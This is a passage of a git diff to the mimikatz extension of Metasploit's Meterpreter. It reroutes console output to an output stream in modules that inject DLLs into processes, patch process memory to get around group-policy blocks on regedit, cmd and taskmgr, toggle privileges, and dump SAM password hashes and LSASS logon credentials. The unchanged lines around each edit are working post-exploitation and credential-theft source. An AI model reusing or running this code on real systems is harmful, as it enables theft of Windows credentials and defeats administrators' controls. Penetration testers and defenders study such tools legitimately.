mod_system::getWinError(); - wcout << endl; + (*outputStream) << L"ko ; " << mod_system::getWinError(); + (*outputStream) << endl; return true; } diff --git a/c/meterpreter/source/extensions/mimikatz/modules/mod_mimikatz_inject.cpp b/c/meterpreter/source/extensions/mimikatz/modules/mod_mimikatz_inject.cpp index a54e37b6..c6b12614 100644 --- a/c/meterpreter/source/extensions/mimikatz/modules/mod_mimikatz_inject.cpp +++ b/c/meterpreter/source/extensions/mimikatz/modules/mod_mimikatz_inject.cpp @@ -24,10 +24,10 @@ bool mod_mimikatz_inject::process(vector * arguments) mod_process::KIWI_PROCESSENTRY32 monProcess; if(mod_process::getUniqueForName(&monProcess, &processName)) { - wcout << L"PROCESSENTRY32(" << processName << L").th32ProcessID = " << monProcess.th32ProcessID << endl; + (*outputStream) << L"PROCESSENTRY32(" << processName << L").th32ProcessID = " << monProcess.th32ProcessID << endl; injectInPid(monProcess.th32ProcessID, fullLib); } - else wcout << L"Trop, ou pas de processus : \'" << processName << L"\' mod_process::getUniqueProcessForName : " << mod_system::getWinError() << endl; + else (*outputStream) << L"Trop, ou pas de processus : \'" << processName << L"\' mod_process::getUniqueProcessForName : " << mod_system::getWinError() << endl; return true; } @@ -40,11 +40,11 @@ bool mod_mimikatz_inject::service(vector * arguments) mod_service::KIWI_SERVICE_STATUS_PROCESS monService; if(mod_service::getUniqueForName(&monService, &serviceName)) { - wcout << L"SERVICE(" << serviceName << L").serviceDisplayName = " << monService.serviceDisplayName << endl; - wcout << L"SERVICE(" << serviceName << L").ServiceStatusProcess.dwProcessId = " << monService.ServiceStatusProcess.dwProcessId << endl; + (*outputStream) << L"SERVICE(" << serviceName << L").serviceDisplayName = " << monService.serviceDisplayName << endl; + (*outputStream) << L"SERVICE(" << serviceName << L").ServiceStatusProcess.dwProcessId = " << monService.ServiceStatusProcess.dwProcessId << endl; injectInPid(monService.ServiceStatusProcess.dwProcessId, fullLib); } - else wcout << L"Service unique introuvable : \'" << serviceName << L"\' ; mod_service::getUniqueForName : " << mod_system::getWinError() << endl; + else (*outputStream) << L"Service unique introuvable : \'" << serviceName << L"\' ; mod_service::getUniqueForName : " << mod_system::getWinError() << endl; return true; } @@ -76,32 +76,32 @@ bool mod_mimikatz_inject::injectInPid(DWORD & pid, wstring & libPath, bool isCom wstring monBuffer = L""; monCommunicator = new mod_pipe(L"kiwi\\mimikatz"); - wcout << L"Attente de connexion du client..." << endl; + (*outputStream) << L"Attente de connexion du client..." << endl; if(monCommunicator->createServer()) { - wcout << L"Serveur connecté à un client !" << endl; + (*outputStream) << L"Serveur connecté à un client !" << endl; if(monCommunicator->readFromPipe(monBuffer)) { - wcout << L"Message du processus :" << endl << monBuffer << endl; + (*outputStream) << L"Message du processus :" << endl << monBuffer << endl; } else { - wcout << L"Erreur : Impossible de lire le premier message ! ; " << mod_system::getWinError() << endl; + (*outputStream) << L"Erreur : Impossible de lire le premier message ! ; " << mod_system::getWinError() << endl; closeThisCommunicator(); } } else { - wcout << L"Erreur : Impossible de créer un canal de communication ! ; " << mod_system::getWinError() << endl; + (*outputStream) << L"Erreur : Impossible de créer un canal de communication ! ; " << mod_system::getWinError() << endl; closeThisCommunicator(); } } else - wcout << L"Injecté sans communication (legacy)" << endl; - } else wcout << L"Erreur : Impossible d\'injecter ! ; " << mod_system::getWinError() << endl; + (*outputStream) << L"Injecté sans communication (legacy)" << endl; + } else (*outputStream) << L"Erreur : Impossible d\'injecter ! ; " << mod_system::getWinError() << endl; } - else wcout << L"Erreur : un canal de communicaton est déjà ouvert" << endl; + else (*outputStream) << L"Erreur : un canal de communicaton est déjà ouvert" << endl; return reussite; } @@ -111,7 +111,7 @@ bool mod_mimikatz_inject::closeThisCommunicator() { if(monCommunicator) { - wcout << L"Fermeture du canal de communication" << endl; + (*outputStream) << L"Fermeture du canal de communication" << endl; delete monCommunicator; monCommunicator = NULL; } diff --git a/c/meterpreter/source/extensions/mimikatz/modules/mod_mimikatz_minesweeper.cpp b/c/meterpreter/source/extensions/mimikatz/modules/mod_mimikatz_minesweeper.cpp index 1b16d8b3..766d3404 100644 --- a/c/meterpreter/source/extensions/mimikatz/modules/mod_mimikatz_minesweeper.cpp +++ b/c/meterpreter/source/extensions/mimikatz/modules/mod_mimikatz_minesweeper.cpp @@ -29,7 +29,7 @@ bool mod_mimikatz_minesweeper::infos(vector * arguments) STRUCT_MINESWEEPER_BOARD monBoard; if(mod_memory::readMemory(monGame.pBoard, &monBoard, sizeof(STRUCT_MINESWEEPER_BOARD), maStruct->hMineSweeper)) { - wcout << L"Mines : " << monBoard.nbMines << endl << + (*outputStream) << L"Mines : " << monBoard.nbMines << endl << L"Dimension : " << monBoard.nbLignes << L" lignes x " << monBoard.nbColonnes << L" colonnes" << endl << L"Champ : " << endl << endl; @@ -43,15 +43,15 @@ bool mod_mimikatz_minesweeper::infos(vector * arguments) for(DWORD l = 0; l < monBoard.nbLignes; l++) { - wcout << L'\t'; + (*outputStream) << L'\t'; for(DWORD c = 0; c < monBoard.nbColonnes; c++) - wcout << monTableau[l][c] << L' '; - wcout << endl; + (*outputStream) << monTableau[l][c] << L' '; + (*outputStream) << endl; delete[] monTableau[l]; } delete[] monTableau; - } else wcout << L"Impossible de lire les données du plateau" << endl; - } else wcout << L"Impossible de lire les données du jeu" << endl; + } else (*outputStream) << L"Impossible de lire les données du plateau" << endl; + } else (*outputStream) << L"Impossible de lire les données du jeu" << endl; CloseHandle(maStruct->hMineSweeper); } delete maStruct; @@ -84,13 +84,13 @@ bool mod_mimikatz_minesweeper::parseField(structHandleAndAddr * monHandleAndAddr else if(reinterpret_cast(cellules)[l]) monTableau[l][c] = '*'; } - } else wcout << L"Impossible de lire les élements de la colonne : " << c << endl; + } else (*outputStream) << L"Impossible de lire les élements de la colonne : " << c << endl; delete[] cellules; - } else wcout << L"Impossible de lire les références de la colonne : " << c << endl; + } else (*outputStream) << L"Impossible de lire les références de la colonne : " << c << endl; } - } else wcout << L"Impossible de lire les références des colonnes" << endl; + } else (*outputStream) << L"Impossible de lire les références des colonnes" << endl; delete[] ref_colonnes_elements; - } else wcout << L"Impossible de lire les références de l\'élement" << endl; + } else (*outputStream) << L"Impossible de lire les références de l\'élement" << endl; return true; } diff --git a/c/meterpreter/source/extensions/mimikatz/modules/mod_mimikatz_nogpo.cpp b/c/meterpreter/source/extensions/mimikatz/modules/mod_mimikatz_nogpo.cpp index a07e2310..2c23a13d 100644 --- a/c/meterpreter/source/extensions/mimikatz/modules/mod_mimikatz_nogpo.cpp +++ b/c/meterpreter/source/extensions/mimikatz/modules/mod_mimikatz_nogpo.cpp @@ -17,19 +17,19 @@ vector mod_mimikatz_nogpo::getMimiKatzComman bool mod_mimikatz_nogpo::regedit(vector * arguments) { - wcout << L"Editeur de registre : " << (disableSimple(L"regedit.exe", L"DisableRegistryTools", L"KiwiAndRegistryTools") ? "OK" : "KO") << endl; + (*outputStream) << L"Editeur de registre : " << (disableSimple(L"regedit.exe", L"DisableRegistryTools", L"KiwiAndRegistryTools") ? "OK" : "KO") << endl; return true; } bool mod_mimikatz_nogpo::cmd(vector * arguments) { - wcout << L"Invite de commande : " << (disableSimple(L"cmd.exe", L"DisableCMD", L"KiwiAndCMD") ? "OK" : "KO") << endl; + (*outputStream) << L"Invite de commande : " << (disableSimple(L"cmd.exe", L"DisableCMD", L"KiwiAndCMD") ? "OK" : "KO") << endl; return true; } bool mod_mimikatz_nogpo::taskmgr(vector * arguments) { - wcout << L"Gestionnaire de taches : " << (disableSimple(L"taskmgr.exe", L"DisableTaskMgr", L"KiwiAndTaskMgr") ? "OK" : "KO") << endl; + (*outputStream) << L"Gestionnaire de taches : " << (disableSimple(L"taskmgr.exe", L"DisableTaskMgr", L"KiwiAndTaskMgr") ? "OK" : "KO") << endl; return true; } @@ -45,12 +45,12 @@ bool mod_mimikatz_nogpo::olpst(vector * arguments) DWORD pidOutlook = 0; bool reussite = disableSimple(pathToOutlook, szDisable, szKiwi, &pidOutlook); - wcout << L"Outlook avec PST : " << (reussite ? L"OK" : L"KO"); + (*outputStream) << L"Outlook avec PST : " << (reussite ? L"OK" : L"KO"); if(reussite) { mod_patch::patchModuleOfPID(pidOutlook, L"olmapi32.dll", reinterpret_cast(szDisable), sizeof(szDisable), reinterpret_cast(szKiwi), sizeof(szKiwi)); } - } else wcout << L"Outlook introuvable" << endl; + } else (*outputStream) << L"Outlook introuvable" << endl; return true; } @@ -112,18 +112,18 @@ bool mod_mimikatz_nogpo::getApplicationPathFromCLSID(wstring application, wstrin if(reussite = (regError == ERROR_SUCCESS)) { path->assign(reinterpret_cast(monPath)); - } else wcout << "RegQueryValueEx \'" << monPath << "\' : " << mod_system::getWinError(false, regError) << endl; + } else (*outputStream) << "RegQueryValueEx \'" << monPath << "\' : " << mod_system::getWinError(false, regError) << endl; delete[] monPath; - } else wcout << "Le type retourné par \'" << monPath << "\' n\'est pas : REG_SZ" << endl; - } else wcout << "RegQueryValueEx \'" << monPath << "\' : " << mod_system::getWinError(false, regError) << endl; + } else (*outputStream) << "Le type retourné par \'" << monPath << "\' n\'est pas : REG_SZ" << endl; + } else (*outputStream) << "RegQueryValueEx \'" << monPath << "\' : " << mod_system::getWinError(false, regError) << endl; RegCloseKey(hApplicationPath); - } else wcout << "RegOpenKeyEx \'" << regPathToPath << "\' : " << mod_system::getWinError(false, regError) << endl; - } else wcout << "RegQueryValueEx \'" << monGUID << "\' : " << mod_system::getWinError(false, regError) << endl; + } else (*outputStream) << "RegOpenKeyEx \'" << regPathToPath << "\' : " << mod_system::getWinError(false, regError) << endl; + } else (*outputStream) << "RegQueryValueEx \'" << monGUID << "\' : " << mod_system::getWinError(false, regError) << endl; delete[] monGUID; - } else wcout << "Le type retourné par \'" << monGUID << "\' n\'est pas : REG_SZ" << endl; - } else wcout << "RegQueryValueEx \'" << monGUID << "\' : " << mod_system::getWinError(false, regError) << endl; + } else (*outputStream) << "Le type retourné par \'" << monGUID << "\' n\'est pas : REG_SZ" << endl; + } else (*outputStream) << "RegQueryValueEx \'" << monGUID << "\' : " << mod_system::getWinError(false, regError) << endl; RegCloseKey(hApplication); - } else wcout << "RegOpenKeyEx \'" << pathToApplication << "\' : " << mod_system::getWinError(false, regError) << endl; + } else (*outputStream) << "RegOpenKeyEx \'" << pathToApplication << "\' : " << mod_system::getWinError(false, regError) << endl; return reussite; } @@ -145,17 +145,17 @@ bool mod_mimikatz_nogpo::disableSimple(wstring commandLine, SIZE_T taillePattern { if(!(reussite = mod_memory::writeMemory(patternAddr, maCleFinale, taillePattern, mesInfos->hProcess))) { - wcout << L"mod_memory::writeMemory " << mod_system::getWinError() << endl; + (*outputStream) << L"mod_memory::writeMemory " << mod_system::getWinError() << endl; } } - else wcout << L"mod_memory::searchMemory " << mod_system::getWinError() << endl; + else (*outputStream) << L"mod_memory::searchMemory " << mod_system::getWinError() << endl; } - else wcout << L"mod_process::getPeb " << mod_system::getWinError() << endl; + else (*outputStream) << L"mod_process::getPeb " << mod_system::getWinError() << endl; delete monPeb; if(!(ResumeThread(mesInfos->hThread) != -1)) - wcout << L"ResumeThread " << mod_system::getWinError() << endl; + (*outputStream) << L"ResumeThread " << mod_system::getWinError() << endl; if(monPID) { @@ -167,7 +167,7 @@ bool mod_mimikatz_nogpo::disableSimple(wstring commandLine, SIZE_T taillePattern CloseHandle(mesInfos->hThread); CloseHandle(mesInfos->hProcess); } - else wcout << L"mod_process::execProcess " << mod_system::getWinError() << endl; + else (*outputStream) << L"mod_process::execProcess " << mod_system::getWinError() << endl; delete mesInfos; @@ -186,7 +186,7 @@ bool mod_mimikatz_nogpo::disableSimple(wstring commandLine, wstring origKey, wst reussite = disableSimple(commandLine, taillePattern, maCleDeDepart, maCleFinale, monPID); } - else wcout << L"mod_mimikatz_nogpo::disableSimple (unicode) Taille du pattern original différente du pattern cible" << endl; + else (*outputStream) << L"mod_mimikatz_nogpo::disableSimple (unicode) Taille du pattern original différente du pattern cible" << endl; return reussite; } @@ -203,7 +203,7 @@ bool mod_mimikatz_nogpo::disableSimple(wstring commandLine, string origKey, stri reussite = disableSimple(commandLine, taillePattern, maCleDeDepart, maCleFinale, monPID); } - else wcout << L"mod_mimikatz_nogpo::disableSimple (non-unicode) Taille du pattern original différente du pattern cible" << endl; + else (*outputStream) << L"mod_mimikatz_nogpo::disableSimple (non-unicode) Taille du pattern original différente du pattern cible" << endl; return reussite; } diff --git a/c/meterpreter/source/extensions/mimikatz/modules/mod_mimikatz_privilege.cpp b/c/meterpreter/source/extensions/mimikatz/modules/mod_mimikatz_privilege.cpp index dd493d93..c268c0ea 100644 --- a/c/meterpreter/source/extensions/mimikatz/modules/mod_mimikatz_privilege.cpp +++ b/c/meterpreter/source/extensions/mimikatz/modules/mod_mimikatz_privilege.cpp @@ -45,7 +45,7 @@ bool mod_mimikatz_privilege::simplePriv(wstring priv, vector * argument { bool ajout = arguments->empty(); - wcout << L"Demande d" << (ajout ? L"\'ACTIVATION" : L"e RETRAIT") << L" du privilège : " << priv << L" : "; + (*outputStream) << L"Demande d" << (ajout ? L"\'ACTIVATION" : L"e RETRAIT") << L" du privilège : " << priv << L" : "; vector> * mesPrivs = new vector>; mesPrivs->push_back(make_pair(priv, ajout ? SE_PRIVILEGE_ENABLED : 0)); @@ -54,10 +54,10 @@ bool mod_mimikatz_privilege::simplePriv(wstring priv, vector * argument delete mesPrivs; if(reussite) - wcout << L"OK"; + (*outputStream) << L"OK"; else - wcout << L"KO ; " << mod_system::getWinError(); - wcout << endl; + (*outputStream) << L"KO ; " << mod_system::getWinError(); + (*outputStream) << endl; return reussite; } @@ -74,10 +74,10 @@ bool mod_mimikatz_privilege::multiplePrivs(vector * privs, DWORD type) delete mesPrivs; if(reussite) - wcout << L"OK"; + (*outputStream) << L"OK"; else - wcout << L"KO ; " << mod_system::getWinError(); - wcout << endl; + (*outputStream) << L"KO ; " << mod_system::getWinError(); + (*outputStream) << endl; return reussite; } @@ -91,40 +91,40 @@ bool mod_mimikatz_privilege::list(vector * arguments) { for(vector>::iterator monPrivilege = mesPrivs->begin(); (monPrivilege != mesPrivs->end()) ; monPrivilege++) { - wcout << setw(35) << setfill(wchar_t(L' ')) << left << monPrivilege->first << right << L'\t'; + (*outputStream) << setw(35) << setfill(wchar_t(L' ')) << left << monPrivilege->first << right << L'\t'; if(monPrivilege->second & SE_PRIVILEGE_VALID_ATTRIBUTES) { if(monPrivilege->second & SE_PRIVILEGE_ENABLED_BY_DEFAULT) { - wcout << L"ENABLED_BY_DEFAULT "; + (*outputStream) << L"ENABLED_BY_DEFAULT "; } if(monPrivilege->second & SE_PRIVILEGE_ENABLED) { - wcout << L"ENABLED "; + (*outputStream) << L"ENABLED "; } if(monPrivilege->second & SE_PRIVILEGE_REMOVED) { - wcout << L"REMOVED "; + (*outputStream) << L"REMOVED "; } if(monPrivilege->second & SE_PRIVILEGE_USED_FOR_ACCESS) { - wcout << L"USED_FOR_ACCESS "; + (*outputStream) << L"USED_FOR_ACCESS "; } if(monPrivilege->second & SE_PRIVILEGE_REMOVED) { - wcout << L"REMOVED"; + (*outputStream) << L"REMOVED"; } } - wcout << endl; + (*outputStream) << endl; } } - else wcout << mod_system::getWinError() << endl; + else (*outputStream) << mod_system::getWinError() << endl; return true; } diff --git a/c/meterpreter/source/extensions/mimikatz/modules/mod_mimikatz_process.cpp b/c/meterpreter/source/extensions/mimikatz/modules/mod_mimikatz_process.cpp index d7ba6aee..8918f6d1 100644 --- a/c/meterpreter/source/extensions/mimikatz/modules/mod_mimikatz_process.cpp +++ b/c/meterpreter/source/extensions/mimikatz/modules/mod_mimikatz_process.cpp @@ -26,7 +26,7 @@ bool mod_mimikatz_process::start(vector * arguments) bool paused = false; bool sudo = false; - wcout << L"Demande d\'exécution de : \'" << commande << L"'" << endl; + (*outputStream) << L"Demande d\'exécution de : \'" << commande << L"'" << endl; PROCESS_INFORMATION pi = {INVALID_HANDLE_VALUE, INVALID_HANDLE_VALUE, 0, 0}; switch(arguments->size()) @@ -57,19 +57,19 @@ bool mod_mimikatz_process::start(vector * arguments) if(mod_process::start(&commande, &pi, paused, sudo)) { if(paused) - wcout << L" * Le Thread principal est suspendu ! Reprise avec : thread::resume " << pi.dwThreadId << endl; + (*outputStream) << L" * Le Thread principal est suspendu ! Reprise avec : thread::resume " << pi.dwThreadId << endl; if(sudo) - wcout << L" * Le processus est démarré avec de fausses données d\'identification" << endl; + (*outputStream) << L" * Le processus est démarré avec de fausses données d\'identification" << endl; printInfosFromPid(pi.dwProcessId, pi.dwThreadId); } - else wcout << L"mod_process::start ; " << mod_system::getWinError() << endl; + else (*outputStream) << L"mod_process::start ; " << mod_system::getWinError() << endl; } else { doStartProcess_syntaxerror: - wcout << L"Erreur de syntaxe ; " << L"process::start [/paused] [/sudo] commande" << endl; + (*outputStream) << L"Erreur de syntaxe ; " << L"process::start [/paused] [/sudo] commande" << endl; } return true; @@ -84,14 +84,14 @@ bool mod_mimikatz_process::stop(vector * arguments) if(mod_process::getUniqueForName(&monProcess, &procName)) { - wcout << L"Fin de : " << procName << L'\t'; + (*outputStream) << L"Fin de : " << procName << L'\t'; if(mod_process::stop(monProcess.th32ProcessID)) - wcout << L"OK"; + (*outputStream) << L"OK"; else - wcout << L"KO - mod_process::stop ; " << mod_system::getWinError(); - wcout << endl; + (*outputStream) << L"KO - mod_process::stop ; " << mod_system::getWinError(); + (*outputStream) << endl; } - else wcout << L"mod_process::getUniqueForName ; " << mod_system::getWinError() << endl; + else (*outputStream) << L"mod_process::getUniqueForName ; " << mod_system::getWinError() << endl; } return true; @@ -107,14 +107,14 @@ bool mod_mimikatz_process::suspend(vector * arguments) if(mod_process::getUniqueForName(&monProcess, &procName)) { - wcout << L"Suspension de : " << procName << L'\t'; + (*outputStream) << L"Suspension de : " << procName << L'\t'; if(mod_process::suspend(monProcess.th32ProcessID)) - wcout << L"OK"; + (*outputStream) << L"OK"; else - wcout << L"KO - mod_process::suspend ; " << mod_system::getWinError(); - wcout << endl; + (*outputStream) << L"KO - mod_process::suspend ; " << mod_system::getWinError(); + (*outputStream) << endl; } - else wcout << L"mod_process::getUniqueForName ; " << mod_system::getWinError() << endl; + else (*outputStream) << L"mod_process::getUniqueForName ; " << mod_system::getWinError() << endl; } return true; @@ -130,14 +130,14 @@ bool mod_mimikatz_process::resume(vector * arguments) if(mod_process::getUniqueForName(&monProcess, &procName)) { - wcout << L"Reprise de : " << procName << L'\t'; + (*outputStream) << L"Reprise de : " << procName << L'\t'; if(mod_process::resume(monProcess.th32ProcessID)) - wcout << L"OK"; + (*outputStream) << L"OK"; else - wcout << L"KO - mod_process::resume ; " << mod_system::getWinError(); - wcout << endl; + (*outputStream) << L"KO - mod_process::resume ; " << mod_system::getWinError(); + (*outputStream) << endl; } - else wcout << L"mod_process::getUniqueForName ; " << mod_system::getWinError() << endl; + else (*outputStream) << L"mod_process::getUniqueForName ; " << mod_system::getWinError() << endl; } return true; @@ -151,10 +151,10 @@ bool mod_mimikatz_process::list(vector * arguments) vector * vectorProcess = new vector(); if(mod_process::getList(vectorProcess)) { - wcout << L"PID\tPPID\t#Ths\tpri\timage" << endl; + (*outputStream) << L"PID\tPPID\t#Ths\tpri\timage" << endl; for(vector::iterator monProcess = vectorProcess->begin(); monProcess != vectorProcess->end(); monProcess++) { - wcout << + (*outputStream) << setw(5) << setfill(wchar_t(' ')) << monProcess->th32ProcessID << L'\t' << setw(5) << setfill(wchar_t(' ')) << monProcess->th32ParentProcessID << L'\t' << setw(5) << setfill(wchar_t(' ')) << monProcess->cntThreads << L'\t' << @@ -163,7 +163,7 @@ bool mod_mimikatz_process::list(vector * arguments) endl; } } - else wcout << L"mod_process::getList ; " << mod_system::getWinError() << endl; + else (*outputStream) << L"mod_process::getList ; " << mod_system::getWinError() << endl; delete vectorProcess; return true; @@ -183,14 +183,14 @@ bool mod_mimikatz_process::modules(vector * arguments) vector * vectorModules = new vector(); if(mod_process::getModulesListForProcessId(vectorModules, &processId)) { - wcout << L"@Base\tTaille\tModule\tPath" << endl; + (*outputStream) << L"@Base\tTaille\tModule\tPath" << endl; for(vector::iterator monModule = vectorModules->begin(); monModule != vectorModules->end(); monModule++) { - wcout << monModule->modBaseAddr << L'\t' << monModule->modBaseSize << '\t' << monModule->szModule << L'\t' << monModule->szExePath << endl; + (*outputStream) << monModule->modBaseAddr << L'\t' << monModule->modBaseSize << '\t' << monModule->szModule << L'\t' << monModule->szExePath << endl; } } else - wcout << L"mod_process::getModulesListForProcessId ; " << mod_system::getWinError() << endl; + (*outputStream) << L"mod_process::getModulesListForProcessId ; " << mod_system::getWinError() << endl; delete vectorModules; return true; @@ -229,7 +229,7 @@ bool mod_mimikatz_process::iat(vector * arguments) { printIATFromModule(monModule, monHandle); } - else wcout << L"mod_process::getUniqueModuleForName ; " << mod_system::getWinError() << endl; + else (*outputStream) << L"mod_process::getUniqueModuleForName ; " << mod_system::getWinError() << endl; delete monModule; } else @@ -240,7 +240,7 @@ bool mod_mimikatz_process::iat(vector * arguments) for(vector::iterator monModule = vectorModules->begin(); monModule != vectorModules->end(); monModule++) printIATFromModule(&*monModule, monHandle); } - else wcout << L"mod_process::getModulesListForProcessId ; " << mod_system::getWinError() << endl; + else (*outputStream) << L"mod_process::getModulesListForProcessId ; " << mod_system::getWinError() << endl; delete vectorModules; } @@ -248,32 +248,32 @@ bool mod_mimikatz_process::iat(vector * arguments) CloseHandle(monHandle); } } - else wcout << L"mod_process::getUniqueForName ; " << mod_system::getWinError() << endl; + else (*outputStream) << L"mod_process::getUniqueForName ; " << mod_system::getWinError() << endl; return true; } void mod_mimikatz_process::printInfosFromPid(DWORD &PID, DWORD ThreadId) { - wcout << L"PID : " << PID << endl; + (*outputStream) << L"PID : " << PID << endl; if(ThreadId) { - wcout << L"ThreadID : " << ThreadId << endl; + (*outputStream) << L"ThreadID : " << ThreadId << endl; } LUID monId = {0, 0}; if(mod_process::getAuthentificationIdFromProcessId(PID, monId)) { - wcout << "AuthId_h : " << monId.HighPart << endl; - wcout << "AuthId_l : " << monId.LowPart << endl; + (*outputStream) << "AuthId_h : " << monId.HighPart << endl; + (*outputStream) << "AuthId_l : " << monId.LowPart << endl; } - else wcout << L"Erreur : " << mod_system::getWinError() << endl; + else (*outputStream) << L"Erreur : " << mod_system::getWinError() << endl; } void mod_mimikatz_process::printIATFromModule(mod_process::KIWI_MODULEENTRY32 * monModule, HANDLE monHandle) { - wcout << monModule->szModule << L" -> " << monModule->szExePath << endl; + (*outputStream) << monModule->szModule << L" -> " << monModule->szExePath << endl; PBYTE baseAddr = reinterpret_cast(monModule->modBaseAddr); vector>> * monIAT = new vector>>(); @@ -281,15 +281,15 @@ void mod_mimikatz_process::printIATFromModule(mod_process::KIWI_MODULEENTRY32 * { for(vector>>::iterator monModuleImporte = monIAT->begin(); monModuleImporte != monIAT->end(); monModuleImporte++) { - wcout << L" - Imports depuis : " << monModuleImporte->first.c_str() << endl; + (*outputStream) << L" - Imports depuis : " << monModuleImporte->first.c_str() << endl; for(vector::iterator maFonctionImporte = monModuleImporte->second.begin(); maFonctionImporte != monModuleImporte->second.end(); maFonctionImporte++) { - wcout << L" " << maFonctionImporte->ptrToFunc << L" -> " << maFonctionImporte->ptrFunc << L' '; + (*outputStream) << L" " << maFonctionImporte->ptrToFunc << L" -> " << maFonctionImporte->ptrFunc << L' '; if(maFonctionImporte->Ordinal != 0) - wcout << L"O# " << maFonctionImporte->Ordinal; + (*outputStream) << L"O# " << maFonctionImporte->Ordinal; else - wcout << maFonctionImporte->funcName.c_str(); - wcout << endl; + (*outputStream) << maFonctionImporte->funcName.c_str(); + (*outputStream) << endl; } } } diff --git a/c/meterpreter/source/extensions/mimikatz/modules/mod_mimikatz_samdump.cpp b/c/meterpreter/source/extensions/mimikatz/modules/mod_mimikatz_samdump.cpp index 4ed941b9..61c98fb3 100644 --- a/c/meterpreter/source/extensions/mimikatz/modules/mod_mimikatz_samdump.cpp +++ b/c/meterpreter/source/extensions/mimikatz/modules/mod_mimikatz_samdump.cpp @@ -31,7 +31,7 @@ bool mod_mimikatz_samdump::full(vector * arguments) if(getInfosFromHive(arguments->front().c_str(), bootkey)) { if(!getUsersAndHashesFromHive(arguments->back().c_str(), bootkey)) - wcout << L"Erreur lors de l\'exploration des ruches" << endl; + (*outputStream) << L"Erreur lors de l\'exploration des ruches" << endl; } } else @@ -39,7 +39,7 @@ bool mod_mimikatz_samdump::full(vector * arguments) if(getInfosFromReg(bootkey)) { if(!getUsersAndHashesFromReg(bootkey)) - wcout << L"Erreur lors de l\'exploration du registre" << endl; + (*outputStream) << L"Erreur lors de l\'exploration du registre" << endl; } } return true; @@ -127,11 +127,11 @@ bool mod_mimikatz_samdump::getInfosFromHive(wstring systemHive, unsigned char bo wstring * computerName = new wstring(); if(getComputerNameFromHive(monHive, fullControlSet, computerName)) - wcout << L"Ordinateur : " << *computerName << endl; + (*outputStream) << L"Ordinateur : " << *computerName << endl; delete computerName; if(reussite = getBootKeyFromHive(monHive, fullControlSet, bootkey)) - wcout << L"BootKey : " << mod_text::stringOfHex(bootkey, 0x10) << endl; + (*outputStream) << L"BootKey : " << mod_text::stringOfHex(bootkey, 0x10) << endl; delete fullControlSet; } } @@ -213,12 +213,12 @@ bool mod_mimikatz_samdump::getBootKeyFromReg(BYTE bootkey[0x10]) code = RegQueryInfoKey(monSecret, monBuffer, &maTaille, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL); if(code == ERROR_SUCCESS) swscanf_s(monBuffer, L"%x", (DWORD *) (&key[i * sizeof(DWORD)])); - else wcout << L"RegQueryInfoKey " << kn[i] << " : " << mod_system::getWinError(false, code) << endl; + else (*outputStream) << L"RegQueryInfoKey " << kn[i] << " : " << mod_system::getWinError(false, code) << endl; RegCloseKey(monSecret); - } else wcout << L"RegOpenKeyEx " << kn[i] << " : " << mod_system::getWinError(false, code) << endl; + } else (*outputStream) << L"RegOpenKeyEx " << kn[i] << " : " << mod_system::getWinError(false, code) << endl; } RegCloseKey(monLSA); - } else wcout << L"RegOpenKeyEx LSA : " << mod_system::getWinError(false, code) << endl; + } else (*outputStream) << L"RegOpenKeyEx LSA : " << mod_system::getWinError(false, code) << endl; if(reussite = (code == ERROR_SUCCESS)) mod_hash::getBootKeyFromKey(bootkey, key); @@ -253,11 +253,11 @@ bool mod_mimikatz_samdump::getInfosFromReg(BYTE bootkey[0x10]) wstring * computerName = new wstring(); if(mod_system::getComputerName(computerName)) - wcout << L"Ordinateur : " << *computerName << endl; + (*outputStream) << L"Ordinateur : " << *computerName << endl; delete computerName; if(reussite = getBootKeyFromReg(bootkey)) - wcout << L"BootKey : " << mod_text::stringOfHex(bootkey, 0x10) << endl; + (*outputStream) << L"BootKey : " << mod_text::stringOfHex(bootkey, 0x10) << endl; return reussite; } @@ -321,18 +321,18 @@ bool mod_mimikatz_samdump::getUsersAndHashesFromReg(BYTE bootkey[0x10]) RegCloseKey(monUser); } } - } else wcout << L"RegEnumKeyExW : " << mod_system::getWinError(false, code) << endl; + } else (*outputStream) << L"RegEnumKeyExW : " << mod_system::getWinError(false, code) << endl; } delete[] monRid; } RegCloseKey(mesUsers); - } else wcout << L"RegOpenKeyEx Users : " << mod_system::getWinError(false, code) << endl; + } else (*outputStream) << L"RegOpenKeyEx Users : " << mod_system::getWinError(false, code) << endl; } - } else wcout << L"RegQueryValueEx 2 F : " << mod_system::getWinError(false, code) << endl; + } else (*outputStream) << L"RegQueryValueEx 2 F : " << mod_system::getWinError(false, code) << endl; delete[] bufferF; - } else wcout << L"RegQueryValueEx 1 F : " << mod_system::getWinError(false, code) << endl; + } else (*outputStream) << L"RegQueryValueEx 1 F : " << mod_system::getWinError(false, code) << endl; RegCloseKey(maSAM); - } else wcout << L"RegOpenKeyEx SAM : " << mod_system::getWinError(false, code) << endl; + } else (*outputStream) << L"RegOpenKeyEx SAM : " << mod_system::getWinError(false, code) << endl; return reussite; } @@ -342,7 +342,7 @@ void mod_mimikatz_samdump::infosFromUserAndKey(mod_hash::USER_F * userF, mod_has wstring hashLM, hashNTLM; mod_hash::decryptHash(&hashLM, hBootKey, userV, &userV->LM, userF->UserId, false); mod_hash::decryptHash(&hashNTLM, hBootKey, userV, &userV->NTLM, userF->UserId, true); - wcout << endl << + (*outputStream) << endl << L"Rid : " << userF->UserId << endl << L"User : " << wstring((wchar_t *) (&(userV->datas) + userV->Username.offset), userV->Username.lenght / sizeof(wchar_t)) << endl << L"LM : " << hashLM << endl << diff --git a/c/meterpreter/source/extensions/mimikatz/modules/mod_mimikatz_sekurlsa.cpp b/c/meterpreter/source/extensions/mimikatz/modules/mod_mimikatz_sekurlsa.cpp index a49a9a01..25b56d9e 100644 --- a/c/meterpreter/source/extensions/mimikatz/modules/mod_mimikatz_sekurlsa.cpp +++ b/c/meterpreter/source/extensions/mimikatz/modules/mod_mimikatz_sekurlsa.cpp @@ -34,7 +34,7 @@ bool mod_mimikatz_sekurlsa::getLogonPasswords(vector * arguments) if(searchLSASSDatas()) getLogonData(arguments, &GLOB_ALL_Providers); else - wcout << L"Données LSASS en erreur" << endl; + (*outputStream) << L"Données LSASS en erreur" << endl; return true; } @@ -103,12 +103,12 @@ bool mod_mimikatz_sekurlsa::searchLSASSDatas() } } } else { - wcout << L"mod_process::getVeryBasicModulesListForProcess : " << mod_system::getWinError() << endl; + (*outputStream) << L"mod_process::getVeryBasicModulesListForProcess : " << mod_system::getWinError() << endl; CloseHandle(hLSASS); hLSASS = NULL; } - } else wcout << L"OpenProcess : " << mod_system::getWinError() << endl; - } else wcout << L"mod_process::getUniqueForName : " << mod_system::getWinError() << endl; + } else (*outputStream) << L"OpenProcess : " << mod_system::getWinError() << 